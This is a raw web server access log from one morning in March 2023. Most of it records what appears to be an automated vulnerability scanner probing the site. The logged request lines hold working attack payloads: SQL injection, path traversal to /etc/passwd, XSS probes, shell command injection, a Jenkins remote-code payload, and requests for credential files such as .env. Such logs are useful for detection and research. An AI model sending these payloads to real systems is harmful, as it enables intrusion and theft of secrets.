90.151.171.108 - - [08/Mar/2023:08:56:37 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [08/Mar/2023:08:56:42 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:08:56:42 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:09:05:14 +0530] "GET /wp-admin/setup-config.php?step=1 HTTP/1.1" 404 1044
72.44.65.82 - - [08/Mar/2023:09:05:46 +0530] "GET /api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27 HTTP/1.1" 404 1032
72.44.65.82 - - [08/Mar/2023:09:07:46 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:09:08:06 +0530] "GET /wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_return_url=https://interact.sh&admin_custom_language_toggle=1 HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:09:11:17 +0530] "GET /exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 1014
72.44.65.82 - - [08/Mar/2023:09:11:39 +0530] "GET /default.php.bak HTTP/1.1" 404 1024
72.44.65.82 - - [08/Mar/2023:09:11:57 +0530] "GET /config.php.bak HTTP/1.1" 404 1022
72.44.65.82 - - [08/Mar/2023:09:12:07 +0530] "GET /header.php.bak HTTP/1.1" 404 1022
72.44.65.82 - - [08/Mar/2023:09:12:19 +0530] "GET /login.php.bak HTTP/1.1" 404 1020
72.44.65.82 - - [08/Mar/2023:09:12:20 +0530] "GET /database.php.bak HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:09:12:31 +0530] "GET /conn.php.bak HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:09:12:34 +0530] "GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:09:12:38 +0530] "GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:09:12:39 +0530] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:09:12:39 +0530] "GET /db_config.php.bak HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:09:12:46 +0530] "GET /agc/vicidial_mysqli_errors.txt HTTP/1.1" 404 1054
72.44.65.82 - - [08/Mar/2023:09:12:46 +0530] "GET /404.php.bak HTTP/1.1" 404 1016
72.44.65.82 - - [08/Mar/2023:09:12:47 +0530] "GET /wp-config.php.bak HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:09:14:05 +0530] "GET /search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1006
167.94.146.58 - - [08/Mar/2023:09:14:19 +0530] "GET / HTTP/1.1" 200 11250
167.94.146.58 - - [08/Mar/2023:09:14:19 +0530] "GET / HTTP/1.1" 200 11250
167.94.146.58 - - [08/Mar/2023:09:14:19 +0530] "PRI * HTTP/2.0" 505 -
167.94.146.58 - - [08/Mar/2023:09:14:20 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
151.247.20.186 - - [08/Mar/2023:09:16:21 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:09:21:01 +0530] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 404 1094
72.44.65.82 - - [08/Mar/2023:09:22:27 +0530] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 404 1064
45.79.128.205 - - [08/Mar/2023:09:25:23 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:09:31:04 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:09:31:04 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:09:31:04 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:09:31:05 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:09:31:05 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:09:31:10 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:09:31:10 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:09:31:10 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:09:31:31 +0530] "GET /plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1048
72.44.65.82 - - [08/Mar/2023:09:33:02 +0530] "GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1" 404 1088
72.44.65.82 - - [08/Mar/2023:09:33:27 +0530] "GET /config/getuser?index=0 HTTP/1.1" 404 1022
45.79.181.251 - - [08/Mar/2023:09:34:49 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:09:35:13 +0530] "POST /hub/login?next HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:09:38:04 +0530] "GET /gateway/routes HTTP/1.1" 404 1022
72.44.65.82 - - [08/Mar/2023:09:38:12 +0530] "GET /actuator/gateway/routes HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:09:38:22 +0530] "GET /wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1066
72.44.65.82 - - [08/Mar/2023:09:39:06 +0530] "POST /index.php HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:09:39:17 +0530] "POST /general/userinfo.php?UID=1 HTTP/1.1" 404 1034
72.44.65.82 - - [08/Mar/2023:09:39:19 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
72.44.65.82 - - [08/Mar/2023:09:39:19 +0530] "GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1" 404 1052
72.44.65.82 - - [08/Mar/2023:09:41:05 +0530] "POST /xxl-job-admin/login HTTP/1.1" 404 1032
72.44.65.82 - - [08/Mar/2023:09:49:13 +0530] "GET /../../WEB-INF/web.xml HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:09:49:20 +0530] "GET /%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1" 404 1052
72.44.65.82 - - [08/Mar/2023:09:49:21 +0530] "GET /%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1" 404 1066
72.44.65.82 - - [08/Mar/2023:09:49:29 +0530] "GET /%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1" 404 1080
72.44.65.82 - - [08/Mar/2023:09:49:40 +0530] "GET /../../WEB-INF/web.xml;x= HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:09:49:52 +0530] "GET /WEB-INF/web.xml HTTP/1.1" 404 992
72.44.65.82 - - [08/Mar/2023:09:50:02 +0530] "GET /../WEB-INF/web.xml HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:09:50:10 +0530] "GET /%c0%ae/WEB-INF/web.xml HTTP/1.1" 404 1038
72.44.65.82 - - [08/Mar/2023:09:59:19 +0530] "POST /MUP/ HTTP/1.1" 404 1002
72.44.65.82 - - [08/Mar/2023:10:00:16 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:10:00:31 +0530] "GET /ui/vropspluginui/rest/services/getstatus HTTP/1.1" 404 1074
72.44.65.82 - - [08/Mar/2023:10:05:02 +0530] "GET /wp-content/plugins/athlon-manage-calameo-publications/thickbox_content.php?attachment_id=id%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%26 HTTP/1.1" 404 1142
72.44.65.82 - - [08/Mar/2023:10:05:48 +0530] "GET /wp-content/themes/weekender/friend.php?id=aHR0cHM6Ly9pbnRlcmFjdC5zaA== HTTP/1.1" 404 1070
72.44.65.82 - - [08/Mar/2023:10:06:05 +0530] "GET /wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1096
72.44.65.82 - - [08/Mar/2023:10:07:26 +0530] "GET /ajax/telemetry.php HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:10:07:27 +0530] "GET /glpi/ajax/telemetry.php HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:10:11:12 +0530] "GET /wps/portal/client/welcome/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 HTTP/1.1" 404 1312
72.44.65.82 - - [08/Mar/2023:10:11:24 +0530] "GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBQfxRYSYCHh5mHoYWBj7-RL1DC1y3M2NXCx9jA3RiqAI8ZBbmhEQaZjooABQv7ag!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ HTTP/1.1" 404 1968
72.44.65.82 - - [08/Mar/2023:10:11:34 +0530] "GET /wps/portal/!ut/p/z1/pZHBDoIwDIYfqZVF4DoIEg5KBEHWi9mBIAnbjCEefHqH8SARJNGe2qRf_78tEFRAWt7aRvat0bKztSD3hKPgGGROwBDjEuH4bOBxWewx9NzUOzBMki3mWRSs_M0a6IN_n_Ti5wRiZ4Kf0J9r8PEXfmTwL_0Sl_YXlvfm-CRFKLS5KvuJHAgoDXeL9wKSBkR_VkPa6QZEra1N-rrJcKglqxdV2KjuEVM-czP-AKyJL-g!/dz/d5/L2dBISEvZ0FBIS9nQSEh/ HTTP/1.1" 404 1562
90.151.171.106 - - [08/Mar/2023:10:13:37 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:10:13:37 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:10:13:37 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:10:13:37 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:10:13:37 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:10:13:42 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:10:13:42 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:10:13:42 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:10:15:27 +0530] "GET /testing-put.txt HTTP/1.1" 404 1024
72.44.65.82 - - [08/Mar/2023:10:17:09 +0530] "-" 400 -
78.108.177.51 - - [08/Mar/2023:10:17:56 +0530] "GET / HTTP/1.0" 200 11230
72.44.65.82 - - [08/Mar/2023:10:18:52 +0530] "POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 404 1070
72.44.65.82 - - [08/Mar/2023:10:19:40 +0530] "POST /wiki/pages/createpage-entervariables.action HTTP/1.1" 404 1080
72.44.65.82 - - [08/Mar/2023:10:19:44 +0530] "POST /pages/doenterpagevariables.action HTTP/1.1" 404 1060
72.44.65.82 - - [08/Mar/2023:10:19:45 +0530] "POST /pages/createpage.action?spaceKey=myproj HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:10:19:57 +0530] "POST /pages/createpage-entervariables.action HTTP/1.1" 404 1070
72.44.65.82 - - [08/Mar/2023:10:20:11 +0530] "POST /templates/editor-preload-container HTTP/1.1" 404 1062
72.44.65.82 - - [08/Mar/2023:10:20:11 +0530] "POST /users/user-dark-features HTTP/1.1" 404 1042
72.44.65.82 - - [08/Mar/2023:10:23:57 +0530] "POST /sysShell HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:10:27:37 +0530] "GET /wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E&feed=instagram HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:10:29:34 +0530] "GET /cgi-bin/GetSrvInfo.exe HTTP/1.1" 404 1038
72.44.65.82 - - [08/Mar/2023:10:31:16 +0530] "GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:10:31:33 +0530] "GET /anchor/errors.log HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:10:31:55 +0530] "POST /cobbler_api HTTP/1.1" 404 1016
46.174.191.29 - - [08/Mar/2023:10:32:09 +0530] "GET / HTTP/1.0" 200 11230
72.44.65.82 - - [08/Mar/2023:10:33:24 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:10:35:17 +0530] "GET /dms/admin/accounts/payment_history.php?account_id=2%27 HTTP/1.1" 404 1070
72.44.65.82 - - [08/Mar/2023:10:38:16 +0530] "GET /auth/login?to=/92874%27alert(document.domain)//280 HTTP/1.1" 404 1014
107.189.7.43 - - [08/Mar/2023:10:39:04 +0530] "CONNECT baidu.com:443 HTTP/1.1" 400 -
151.235.219.100 - - [08/Mar/2023:10:47:08 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:10:47:20 +0530] "GET /sftp-config.json HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:10:49:50 +0530] "GET /telescope/requests HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:10:50:52 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:10:54:26 +0530] "GET /ie50/system/login/SysLoginUser.aspx?Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Login=Error HTTP/1.1" 404 1064
72.44.65.82 - - [08/Mar/2023:10:58:47 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:10:59:47 +0530] "GET /log/ HTTP/1.1" 404 1002
72.44.65.82 - - [08/Mar/2023:11:00:28 +0530] "GET /web/static/c:/windows/win.ini HTTP/1.1" 404 1052
72.44.65.82 - - [08/Mar/2023:11:00:28 +0530] "GET /base/static/c:/windows/win.ini HTTP/1.1" 404 1054
72.44.65.82 - - [08/Mar/2023:11:01:16 +0530] "GET /../../../../../../etc/passwd HTTP/1.1" 400 -
78.108.177.51 - - [08/Mar/2023:11:03:41 +0530] "GET / HTTP/1.0" 200 11230
72.44.65.82 - - [08/Mar/2023:11:04:20 +0530] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 404 1054
90.151.171.108 - - [08/Mar/2023:11:06:29 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:11:06:29 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:11:06:29 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:11:06:29 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:11:06:34 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [08/Mar/2023:11:06:34 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [08/Mar/2023:11:06:34 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:11:06:34 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:11:06:51 +0530] "GET /wp-admin/admin-ajax.php?action=fetch_posts&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&stream-id=1 HTTP/1.1" 404 1040
45.95.55.150 - - [08/Mar/2023:11:11:17 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:11:11:44 +0530] "GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1" 404 1162
72.44.65.82 - - [08/Mar/2023:11:11:44 +0530] "GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1" 404 1164
92.118.39.82 - - [08/Mar/2023:11:11:56 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:11:11:58 +0530] "GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1" 404 1156
72.44.65.82 - - [08/Mar/2023:11:11:59 +0530] "GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1" 404 1160
72.44.65.82 - - [08/Mar/2023:11:12:00 +0530] "GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1" 404 1162
72.44.65.82 - - [08/Mar/2023:11:12:04 +0530] "GET /actuator/jolokia/read/java.lang:type=Memory HTTP/1.1" 404 1080
72.44.65.82 - - [08/Mar/2023:11:12:35 +0530] "GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1" 404 1146
72.44.65.82 - - [08/Mar/2023:11:12:35 +0530] "GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1" 404 1130
72.44.65.82 - - [08/Mar/2023:11:12:36 +0530] "GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1" 404 1138
72.44.65.82 - - [08/Mar/2023:11:13:35 +0530] "GET /Telerik.ReportViewer.axd?bgColor=_000000%22onload=%22prompt(1)&optype=Parameters HTTP/1.1" 404 1042
72.44.65.82 - - [08/Mar/2023:11:21:00 +0530] "GET /user/scripts/login_par.js HTTP/1.1" 404 1044
72.44.65.82 - - [08/Mar/2023:11:21:20 +0530] "GET /Electron/download/windows/..%5C..%5C..%5CHttp%5Cwebroot%5Cconfig.json HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:11:21:22 +0530] "GET /Electron/download/windows/%5Cwindows%5Cwin.ini HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:11:21:44 +0530] "GET /if.cgi?B_apply=APPLY&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%282MgidtJo6aueFNGBJm0asGUz0Hc%29%3C%2Fscript%3E&failure=fail.htm&max_tcp=3&radio_ping_block=0&redirect=setting.htm&type=ap_tcps_apply HTTP/1.1" 404 1006
72.44.65.82 - - [08/Mar/2023:11:22:57 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:11:26:25 +0530] "GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1" 404 1098
72.44.65.82 - - [08/Mar/2023:11:26:30 +0530] "GET /component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1046
45.95.55.150 - - [08/Mar/2023:11:28:17 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:11:32:34 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:11:32:34 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:11:32:34 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:11:32:35 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:11:32:35 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [08/Mar/2023:11:32:39 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:11:32:39 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:11:32:39 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:11:33:54 +0530] "POST /?destination=node&q=node HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:11:40:30 +0530] "POST /search/ HTTP/1.1" 404 1008
72.44.65.82 - - [08/Mar/2023:11:40:44 +0530] "POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1" 404 1068
72.44.65.82 - - [08/Mar/2023:11:43:51 +0530] "GET /wp-json/acf/v3/options/a?field=plugins&id=active HTTP/1.1" 404 1042
72.44.65.82 - - [08/Mar/2023:11:47:54 +0530] "GET /wp-content/plugins/members-list/admin/view/user.php?page=%22%3E%3Cimg%20src%20onerror=alert(document.domain)%20x HTTP/1.1" 404 1096
72.44.65.82 - - [08/Mar/2023:11:48:18 +0530] "GET /manage/wizard/ HTTP/1.1" 404 1022
72.44.65.82 - - [08/Mar/2023:11:48:22 +0530] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&PW&User='%0acat%20/etc/passwd%0a' HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:11:51:42 +0530] "POST /dip/api/login HTTP/1.1" 404 1020
72.44.65.82 - - [08/Mar/2023:11:51:46 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:11:52:20 +0530] "GET /.dbeaver/credentials-config.json HTTP/1.1" 404 1058
72.44.65.82 - - [08/Mar/2023:11:52:29 +0530] "GET /mobile/shop/lg/mispwapurl.php?LGD_OID=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1052
72.44.65.82 - - [08/Mar/2023:11:54:44 +0530] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 1096
72.44.65.82 - - [08/Mar/2023:11:54:52 +0530] "GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1" 404 1086
72.44.65.82 - - [08/Mar/2023:11:56:24 +0530] "GET /webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:12:06:29 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_addressbook HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:12:07:38 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_travelbook HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:12:09:59 +0530] "GET /etc/designs/xh1x.childrenlist.json//%3Csvg%20onload=alert%28document.domain%29%3E.html HTTP/1.1" 404 1166
72.44.65.82 - - [08/Mar/2023:12:13:40 +0530] "POST / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:12:14:45 +0530] "GET /wizard.htm HTTP/1.1" 404 1014
72.44.65.82 - - [08/Mar/2023:12:15:35 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:12:16:12 +0530] "GET null null" 400 -
90.151.171.106 - - [08/Mar/2023:12:16:20 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:12:16:20 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:12:16:20 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:12:16:20 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:12:16:20 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:12:16:25 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:12:16:25 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:12:16:25 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:12:18:14 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:12:18:45 +0530] "POST /wp-comments-post.php HTTP/1.1" 404 1034
72.44.65.82 - - [08/Mar/2023:12:19:19 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_market HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:12:19:48 +0530] "GET /index.php/component/jemessenger/box_details?dw_file=../../.././../../../etc/passwd&task=download HTTP/1.1" 404 1080
72.44.65.82 - - [08/Mar/2023:12:24:02 +0530] "GET /wgetrc HTTP/1.1" 404 1006
72.44.65.82 - - [08/Mar/2023:12:25:22 +0530] "GET /Partners/application/configs/application.ini HTTP/1.1" 404 1082
72.44.65.82 - - [08/Mar/2023:12:25:40 +0530] "GET /seminovos/application/configs/application.ini HTTP/1.1" 404 1084
72.44.65.82 - - [08/Mar/2023:12:25:47 +0530] "GET /shop/application/configs/application.ini HTTP/1.1" 404 1074
72.44.65.82 - - [08/Mar/2023:12:26:05 +0530] "GET /slr/application/configs/application.ini HTTP/1.1" 404 1072
72.44.65.82 - - [08/Mar/2023:12:33:50 +0530] "GET /wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1084
72.44.65.82 - - [08/Mar/2023:12:35:10 +0530] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload HTTP/1.1" 404 1220
72.44.65.82 - - [08/Mar/2023:12:36:21 +0530] "GET /.env.dev HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:12:36:41 +0530] "GET /.env.prod HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:12:36:52 +0530] "GET /.env.production HTTP/1.1" 404 1024
72.44.65.82 - - [08/Mar/2023:12:36:53 +0530] "GET /.env.production.local HTTP/1.1" 404 1036
72.44.65.82 - - [08/Mar/2023:12:36:56 +0530] "GET /.env.local HTTP/1.1" 404 1014
72.44.65.82 - - [08/Mar/2023:12:37:10 +0530] "GET /.env.stage HTTP/1.1" 404 1014
72.44.65.82 - - [08/Mar/2023:12:37:14 +0530] "GET /.env.live HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:12:37:24 +0530] "GET /.env.save HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:12:37:35 +0530] "GET /.env.www HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:12:37:57 +0530] "GET /.env.51 HTTP/1.1" 404 1008
72.44.65.82 - - [08/Mar/2023:12:38:00 +0530] "GET /.env.103.145 HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:12:41:34 +0530] "POST /userpost/xerox.set HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:12:44:11 +0530] "GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 1130
72.44.65.82 - - [08/Mar/2023:12:44:45 +0530] "GET /wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1084
72.44.65.82 - - [08/Mar/2023:12:47:03 +0530] "GET /../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:12:49:08 +0530] "GET /redirector.php?do=nodelay&url=https://interact.sh HTTP/1.1" 404 1022
